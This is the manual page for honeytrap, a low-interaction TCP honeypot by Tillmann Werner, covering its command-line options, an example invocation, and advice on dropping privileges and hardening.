HONEYTRAP

honeytrap [ -Dpmv ] [ -i interface ] [ -a ip address ]
                [ -l listen timeout ] [ -r read timeout ]
                [ -t loglevel ] [ -L logfile ] [ -P pidfile ]
                [ -C configfile ] [ expression ]

honeytrap is a network security tool written to observe attacks against TCP services. As a low-interactive honeypot, it collects information regarding known or unknown network-based attacks. It starts server processes dynamically at the time of incoming connection requests. This generic behavior makes it possible to respond to most network-based attacks. Observed data can be processed with plugins for automatic analysis.

All data submitted to honeytrap can be dumped to the filesystem for further investigation. Attacks can be parsed automatically for download commands. Plugins enable honeytrap to recognize FTP and TFTP commands and do an automated download of online ressources.

honeytrap must be run by root or installed setuid to root, in order to bind to privileged ports. Always use the -u and -g flags to drop privileges early and switch to an unprivileged user and group as soon as possible.

Read configuration from /etc/honeytrap.conf, run on eth0 as nobody/nogroup and log to /var/log/honeytrap.log. Set the log level to LOG_NOISY ( 5 ) and stay in foreground ( -D ):

	honeytrap -C /etc/honeytrap.conf -i eth0 -u nobody -g nogroup -L /var/log/honeytrap.log -t 5 -D

As a honeypot, honeytrap is exposed to attacks that might compromise the software itself. Running it into a hardened and secured environment is a good idea. Linking against a stack protection library might also improve security. The configure script supports the electric fence malloc debugger. Use it.

bpf(4), pcap(3), tcp(7).

This version of honeytrap was written by Tillmann Werner.